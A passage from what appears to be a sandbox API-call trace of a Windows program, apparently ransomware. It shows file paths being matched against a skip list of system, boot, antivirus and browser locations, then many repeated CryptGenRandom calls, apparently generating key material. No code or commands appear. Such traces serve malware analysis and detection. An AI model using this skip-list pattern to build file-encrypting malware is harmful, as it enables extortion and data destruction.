(pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0159.330] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0159.330] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0159.330] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0159.330] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0159.330] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0159.330] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.330] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0159.330] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0159.330] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0159.331] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0159.331] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0159.331] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0159.331] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0159.331] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0159.331] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0159.331] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0159.331] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.331] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.331] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0159.331] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0159.331] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0159.331] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0159.331] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0159.331] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0159.331] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0159.331] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0159.331] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui", pszSpec="*") returned 1 [0159.331] strlen (_Str="NMoreira") returned 0x8 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.332] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.333] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.334] 